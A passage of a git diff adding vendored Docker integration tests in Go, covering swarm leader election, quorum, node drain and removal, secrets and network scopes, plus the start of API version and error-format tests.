defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + getContainers := func() map[string]*SwarmDaemon { + m := make(map[string]*SwarmDaemon) + for _, d := range []*SwarmDaemon{d1, d2, d3} { + for _, id := range d.activeContainers() { + m[id] = d + } + } + return m + } + + containers := getContainers() + c.Assert(containers, checker.HasLen, instances) + var toRemove string + for i := range containers { + toRemove = i + } + + _, err := containers[toRemove].Cmd("stop", toRemove) + c.Assert(err, checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + containers2 := getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } + + containers = containers2 + for i := range containers { + toRemove = i + } + + // try with killing process outside of docker + pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove) + c.Assert(err, checker.IsNil) + pid, err := strconv.Atoi(strings.TrimSpace(pidStr)) + c.Assert(err, checker.IsNil) + c.Assert(syscall.Kill(pid, syscall.SIGKILL), checker.IsNil) + + time.Sleep(time.Second) // give some time to handle the signal + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + containers2 = getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } +} + +func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) { + // add three managers, one of these is leader + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + // start a service by hitting each of the 3 managers + d1.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "test1" + }) + d2.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "test2" + }) + d3.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "test3" + }) + + // 3 services should be started now, because the requests were proxied to leader + // query each node and make sure it returns 3 services + for _, d := range []*SwarmDaemon{d1, d2, d3} { + services := d.listServices(c) + c.Assert(services, checker.HasLen, 3) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { + // Create 3 nodes + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + // assert that the first node we made is the leader, and the other two are followers + c.Assert(d1.getNode(c, d1.NodeID).ManagerStatus.Leader, checker.True) + c.Assert(d1.getNode(c, d2.NodeID).ManagerStatus.Leader, checker.False) + c.Assert(d1.getNode(c, d3.NodeID).ManagerStatus.Leader, checker.False) + + d1.Stop() // stop the leader + + var ( + leader *SwarmDaemon // keep track of leader + followers []*SwarmDaemon // keep track of followers + ) + checkLeader := func(nodes ...*SwarmDaemon) checkF { + return func(c *check.C) (interface{}, check.CommentInterface) { + // clear these out before each run + leader = nil + followers = nil + for _, d := range nodes { + if d.getNode(c, d.NodeID).ManagerStatus.Leader { + leader = d + } else { + followers = append(followers, d) + } + } + + if leader == nil { + return false, check.Commentf("no leader elected") + } + + return true, check.Commentf("elected %v", leader.id) + } + } + + // wait for an election to occur + waitAndAssert(c, defaultReconciliationTimeout, checkLeader(d2, d3), checker.True) + + // assert that we have a new leader + c.Assert(leader, checker.NotNil) + + // Keep track of the current leader, since we want that to be chosen. + stableleader := leader + + // add the d1, the initial leader, back + d1.Start() + + // TODO(stevvooe): may need to wait for rejoin here + + // wait for possible election + waitAndAssert(c, defaultReconciliationTimeout, checkLeader(d1, d2, d3), checker.True) + // pick out the leader and the followers again + + // verify that we still only have 1 leader and 2 followers + c.Assert(leader, checker.NotNil) + c.Assert(followers, checker.HasLen, 2) + // and that after we added d1 back, the leader hasn't changed + c.Assert(leader.NodeID, checker.Equals, stableleader.NodeID) +} + +func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + d1.createService(c, simpleTestService) + + c.Assert(d2.Stop(), checker.IsNil) + + // make sure there is a leader + waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + + d1.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "top1" + }) + + c.Assert(d3.Stop(), checker.IsNil) + + // make sure there is a leader + waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + + var service swarm.Service + simpleTestService(&service) + service.Spec.Name = "top2" + status, out, err := d1.SockRequest("POST", "/services/create", service.Spec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("deadline exceeded", string(out))) + + c.Assert(d2.Start(), checker.IsNil) + + // make sure there is a leader + waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + + d1.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "top3" + }) +} + +func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + nodes := d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + +loop0: + for _, n := range nodes { + for _, d := range []*SwarmDaemon{d1, d2, d3} { + if n.ID == d.NodeID { + continue loop0 + } + } + c.Errorf("unknown nodeID %v", n.ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + nodes := d.listNodes(c) + + d.updateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + n := d.getNode(c, nodes[0].ID) + c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) { + testRequires(c, Network) + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + _ = s.AddDaemon(c, true, false) + + nodes := d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + + // Getting the info so we can take the NodeID + d2Info, err := d2.info() + c.Assert(err, checker.IsNil) + + // forceful removal of d2 should work + d1.removeNode(c, d2Info.NodeID, true) + + nodes = d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) + + // Restart the node that was removed + err = d2.Restart() + c.Assert(err, checker.IsNil) + + // Give some time for the node to rejoin + time.Sleep(1 * time.Second) + + // Make sure the node didn't rejoin + nodes = d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + // start a service, expect balanced distribution + instances := 8 + id := d1.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + // drain d2, all containers should move to d1 + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityDrain + }) + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) + + // set d2 back to active + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityActive + }) + + instances = 1 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + instances = 8 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + + // drained node first so we don't get any old containers + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + d2ContainerCount := len(d2.activeContainers()) + + // set d2 to paused, scale service up, only d1 gets new tasks + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + instances = 14 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances-d2ContainerCount) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, d2ContainerCount) + +} + +func (s *DockerSwarmSuite) TestAPISwarmLeaveRemovesContainer(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + d.createService(c, simpleTestService, setInstances(instances)) + + id, err := d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + id = strings.TrimSpace(id) + + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances+1) + + c.Assert(d.Leave(false), checker.NotNil) + c.Assert(d.Leave(true), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + id2, err := d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + c.Assert(id, checker.HasPrefix, strings.TrimSpace(id2)) +} + +// #23629 +func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) { + testRequires(c, Network) + s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, false, false) + + id, err := d2.Cmd("run", "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + id = strings.TrimSpace(id) + + err = d2.Join(swarm.JoinRequest{ + RemoteAddrs: []string{"123.123.123.123:1234"}, + }) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "Timeout was reached") + + info, err := d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStatePending) + + c.Assert(d2.Leave(true), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) + + id2, err := d2.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + c.Assert(id, checker.HasPrefix, strings.TrimSpace(id2)) +} + +// #23705 +func (s *DockerSwarmSuite) TestAPISwarmRestoreOnPendingJoin(c *check.C) { + testRequires(c, Network) + d := s.AddDaemon(c, false, false) + err := d.Join(swarm.JoinRequest{ + RemoteAddrs: []string{"123.123.123.123:1234"}, + }) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "Timeout was reached") + + waitAndAssert(c, defaultReconciliationTimeout, d.checkLocalNodeState, checker.Equals, swarm.LocalNodeStatePending) + + c.Assert(d.Stop(), checker.IsNil) + c.Assert(d.Start(), checker.IsNil) + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) +} + +func (s *DockerSwarmSuite) TestAPISwarmManagerRestore(c *check.C) { + d1 := s.AddDaemon(c, true, true) + + instances := 2 + id := d1.createService(c, simpleTestService, setInstances(instances)) + + d1.getService(c, id) + d1.Stop() + d1.Start() + d1.getService(c, id) + + d2 := s.AddDaemon(c, true, true) + d2.getService(c, id) + d2.Stop() + d2.Start() + d2.getService(c, id) + + d3 := s.AddDaemon(c, true, true) + d3.getService(c, id) + d3.Stop() + d3.Start() + d3.getService(c, id) + + d3.Kill() + time.Sleep(1 * time.Second) // time to handle signal + d3.Start() + d3.getService(c, id) +} + +func (s *DockerSwarmSuite) TestAPISwarmScaleNoRollingUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + containers := d.activeContainers() + instances = 4 + d.updateService(c, d.getService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + containers2 := d.activeContainers() + +loop0: + for _, c1 := range containers { + for _, c2 := range containers2 { + if c1 == c2 { + continue loop0 + } + } + c.Errorf("container %v not found in new set %#v", c1, containers2) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmInvalidAddress(c *check.C) { + d := s.AddDaemon(c, false, false) + req := swarm.InitRequest{ + ListenAddr: "", + } + status, _, err := d.SockRequest("POST", "/swarm/init", req) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + + req2 := swarm.JoinRequest{ + ListenAddr: "0.0.0.0:2377", + RemoteAddrs: []string{""}, + } + status, _, err = d.SockRequest("POST", "/swarm/join", req2) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) +} + +func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + + instances := 2 + id := d1.createService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + // drain d2, all containers should move to d1 + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityDrain + }) + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) + + c.Assert(d2.Stop(), checker.IsNil) + + c.Assert(d1.Init(swarm.InitRequest{ + ForceNewCluster: true, + Spec: swarm.Spec{}, + }), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + + d3 := s.AddDaemon(c, true, true) + info, err := d3.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + instances = 4 + d3.updateService(c, d3.getService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) +} + +func simpleTestService(s *swarm.Service) { + ureplicas := uint64(1) + restartDelay := time.Duration(100 * time.Millisecond) + + s.Spec = swarm.ServiceSpec{ + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: "busybox:latest", + Command: []string{"/bin/top"}, + }, + RestartPolicy: &swarm.RestartPolicy{ + Delay: &restartDelay, + }, + }, + Mode: swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &ureplicas, + }, + }, + } + s.Spec.Name = "top" +} + +func serviceForUpdate(s *swarm.Service) { + ureplicas := uint64(1) + restartDelay := time.Duration(100 * time.Millisecond) + + s.Spec = swarm.ServiceSpec{ + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: "busybox:latest", + Command: []string{"/bin/top"}, + }, + RestartPolicy: &swarm.RestartPolicy{ + Delay: &restartDelay, + }, + }, + Mode: swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &ureplicas, + }, + }, + UpdateConfig: &swarm.UpdateConfig{ + Parallelism: 2, + Delay: 4 * time.Second, + FailureAction: swarm.UpdateFailureActionContinue, + }, + } + s.Spec.Name = "updatetest" +} + +func setInstances(replicas int) serviceConstructor { + ureplicas := uint64(replicas) + return func(s *swarm.Service) { + s.Spec.Mode = swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &ureplicas, + }, + } + } +} + +func setImage(image string) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.TaskTemplate.ContainerSpec.Image = image + } +} + +func setFailureAction(failureAction string) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.UpdateConfig.FailureAction = failureAction + } +} + +func setMaxFailureRatio(maxFailureRatio float32) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.UpdateConfig.MaxFailureRatio = maxFailureRatio + } +} + +func setParallelism(parallelism uint64) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.UpdateConfig.Parallelism = parallelism + } +} + +func setConstraints(constraints []string) serviceConstructor { + return func(s *swarm.Service) { + if s.Spec.TaskTemplate.Placement == nil { + s.Spec.TaskTemplate.Placement = &swarm.Placement{} + } + s.Spec.TaskTemplate.Placement.Constraints = constraints + } +} + +func setGlobalMode(s *swarm.Service) { + s.Spec.Mode = swarm.ServiceMode{ + Global: &swarm.GlobalService{}, + } +} + +func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount int) { + var totalMCount, totalWCount int + + for _, d := range cl { + var ( + info swarm.Info + err error + ) + + // check info in a waitAndAssert, because if the cluster doesn't have a leader, `info` will return an error + checkInfo := func(c *check.C) (interface{}, check.CommentInterface) { + info, err = d.info() + return err, check.Commentf("cluster not ready in time") + } + waitAndAssert(c, defaultReconciliationTimeout, checkInfo, checker.IsNil) + if !info.ControlAvailable { + totalWCount++ + continue + } + + var leaderFound bool + totalMCount++ + var mCount, wCount int + + for _, n := range d.listNodes(c) { + waitReady := func(c *check.C) (interface{}, check.CommentInterface) { + if n.Status.State == swarm.NodeStateReady { + return true, nil + } + nn := d.getNode(c, n.ID) + n = *nn + return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.Info.NodeID) + } + waitAndAssert(c, defaultReconciliationTimeout, waitReady, checker.True) + + waitActive := func(c *check.C) (interface{}, check.CommentInterface) { + if n.Spec.Availability == swarm.NodeAvailabilityActive { + return true, nil + } + nn := d.getNode(c, n.ID) + n = *nn + return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.Info.NodeID) + } + waitAndAssert(c, defaultReconciliationTimeout, waitActive, checker.True) + + if n.Spec.Role == swarm.NodeRoleManager { + c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.Info.NodeID)) + if n.ManagerStatus.Leader { + leaderFound = true + } + mCount++ + } else { + c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.Info.NodeID)) + wCount++ + } + } + c.Assert(leaderFound, checker.True, check.Commentf("lack of leader reported by node %s", info.NodeID)) + c.Assert(mCount, checker.Equals, managerCount, check.Commentf("managers count reported by node %s", info.NodeID)) + c.Assert(wCount, checker.Equals, workerCount, check.Commentf("workers count reported by node %s", info.NodeID)) + } + c.Assert(totalMCount, checker.Equals, managerCount) + c.Assert(totalWCount, checker.Equals, workerCount) +} + +func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { + mCount, wCount := 5, 1 + + var nodes []*SwarmDaemon + for i := 0; i < mCount; i++ { + manager := s.AddDaemon(c, true, true) + info, err := manager.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + nodes = append(nodes, manager) + } + + for i := 0; i < wCount; i++ { + worker := s.AddDaemon(c, true, false) + info, err := worker.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + nodes = append(nodes, worker) + } + + // stop whole cluster + { + var wg sync.WaitGroup + wg.Add(len(nodes)) + errs := make(chan error, len(nodes)) + + for _, d := range nodes { + go func(daemon *SwarmDaemon) { + defer wg.Done() + if err := daemon.Stop(); err != nil { + errs <- err + } + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + daemon.root = filepath.Dir(daemon.root) + } + }(d) + } + wg.Wait() + close(errs) + for err := range errs { + c.Assert(err, check.IsNil) + } + } + + // start whole cluster + { + var wg sync.WaitGroup + wg.Add(len(nodes)) + errs := make(chan error, len(nodes)) + + for _, d := range nodes { + go func(daemon *SwarmDaemon) { + defer wg.Done() + if err := daemon.Start("--iptables=false"); err != nil { + errs <- err + } + }(d) + } + wg.Wait() + close(errs) + for err := range errs { + c.Assert(err, check.IsNil) + } + } + + checkClusterHealth(c, nodes, mCount, wCount) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateWithName(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.createService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + + service := d.getService(c, id) + instances = 5 + + setInstances(instances)(service) + url := fmt.Sprintf("/services/%s/update?version=%d", service.Spec.Name, service.Version.Index) + status, out, err := d.SockRequest("POST", url, service.Spec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) +} + +func (s *DockerSwarmSuite) TestAPISwarmSecretsEmptyList(c *check.C) { + d := s.AddDaemon(c, true, true) + + secrets := d.listSecrets(c) + c.Assert(secrets, checker.NotNil) + c.Assert(len(secrets), checker.Equals, 0, check.Commentf("secrets: %#v", secrets)) +} + +func (s *DockerSwarmSuite) TestAPISwarmSecretsCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secrets := d.listSecrets(c) + c.Assert(len(secrets), checker.Equals, 1, check.Commentf("secrets: %#v", secrets)) + name := secrets[0].Spec.Annotations.Name + c.Assert(name, checker.Equals, testName, check.Commentf("secret: %s", name)) +} + +func (s *DockerSwarmSuite) TestAPISwarmSecretsDelete(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.ID, checker.Equals, id, check.Commentf("secret: %v", secret)) + + d.deleteSecret(c, secret.ID) + status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound, check.Commentf("secret delete: %s", string(out))) +} + +// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`, +// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`. +// This test makes sure the fixes correctly output scopes instead. +func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "foo" + networkCreateRequest := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: false, + }, + } + + var n1 types.NetworkCreateResponse + networkCreateRequest.NetworkCreate.Driver = "bridge" + + status, out, err := d.SockRequest("POST", "/networks/create", networkCreateRequest) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &n1), checker.IsNil) + + var n2 types.NetworkCreateResponse + networkCreateRequest.NetworkCreate.Driver = "overlay" + + status, out, err = d.SockRequest("POST", "/networks/create", networkCreateRequest) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &n2), checker.IsNil) + + var r1 types.NetworkResource + + status, out, err = d.SockRequest("GET", "/networks/"+n1.ID, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &r1), checker.IsNil) + + c.Assert(r1.Scope, checker.Equals, "local") + + var r2 types.NetworkResource + + status, out, err = d.SockRequest("GET", "/networks/"+n2.ID, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &r2), checker.IsNil) + + c.Assert(r2.Scope, checker.Equals, "swarm") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go new file mode 100644 index 0000000000..3b38ba96f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go @@ -0,0 +1,118 @@ +package main + +import ( + "fmt" + "net/http" + "net/http/httptest" + "runtime" + "strconv" + "strings" + + "github.com/docker/docker/api" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIOptionsRoute(c *check.C) { + status, _, err := sockRequest("OPTIONS", "/", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) +} + +func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) { + res, body, err := sockRequestRaw("GET", "/version", nil, "") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + body.Close() + // TODO: @runcom incomplete tests, why old integration tests had this headers + // and here none of the headers below are in the response? + //c.Log(res.Header) + //c.Assert(res.Header.Get("Access-Control-Allow-Origin"), check.Equals, "*") + //c.Assert(res.Header.Get("Access-Control-Allow-Headers"), check.Equals, "Origin, X-Requested-With, Content-Type, Accept, X-Registry-Auth") +} + +func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) { + if daemonPlatform != runtime.GOOS { + c.Skip("Daemon platform doesn't match test platform") + } + if api.MinVersion == api.DefaultVersion { + c.Skip("API MinVersion==DefaultVersion") + } + v := strings.Split(api.MinVersion, ".") + vMinInt, err := strconv.Atoi(v[1]) + c.Assert(err, checker.IsNil) + vMinInt-- + v[1] = strconv.Itoa(vMinInt) + version := strings.Join(v, ".") + + status, body, err := sockRequest("GET", "/v"+version+"/version", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + expected := fmt.Sprintf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", version, api.MinVersion) + c.Assert(strings.TrimSpace(string(body)), checker.Contains, expected) +} + +func (s *DockerSuite) TestAPIDockerAPIVersion(c *check.C) { + var svrVersion string + + server := httptest.NewServer(http.HandlerFunc( + func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("API-Version", api.DefaultVersion) + url := r.URL.Path + svrVersion = url + })) + defer server.Close() + + // Test using the env var first + result := icmd.RunCmd(icmd.Cmd{ + Command: binaryWithArgs("-H="+server.URL[7:], "version"), + Env: appendBaseEnv(false, "DOCKER_API_VERSION=xxx"), + }) + c.Assert(result, icmd.Matches, icmd.Expected{Out: "API version: xxx", ExitCode: 1}) + c.Assert(svrVersion, check.Equals, "/vxxx/version", check.Commentf("%s", result.Compare(icmd.Success))) +} + +func (s *DockerSuite) TestAPIErrorJSON(c *check.C) { + httpResp, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(`{}`), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(getErrorMessage(c, b), checker.Equals, "Config cannot be empty in order to create a container") +} + +func (s *DockerSuite) TestAPIErrorPlainText(c *check.C) { + // Windows requires API 1.25 or later. This test is validating a behaviour which was present + // in v1.23, but changed in 1.24, hence not applicable on Windows. See apiVersionSupportsJSONErrors + testRequires(c, DaemonIsLinux) + httpResp, body, err := sockRequestRaw("POST", "/v1.23/containers/create", strings.NewReader(`{}`), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(string(b)), checker.Equals, "Config cannot be empty in order to create a container") +} + +func (s *DockerSuite) TestAPIErrorNotFoundJSON(c *check.C) { + // 404 is a different code path to normal errors, so test separately + httpResp, body, err := sockRequestRaw("GET", "/notfound", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(getErrorMessage(c, b), checker.Equals, "page not found") +} + +func (s *DockerSuite) TestAPIErrorNotFoundPlainText(c *check.C) { + httpResp, body, err := sockRequestRaw("GET", "/v1.23/notfound", nil, "application/json") + c.Assert(err, 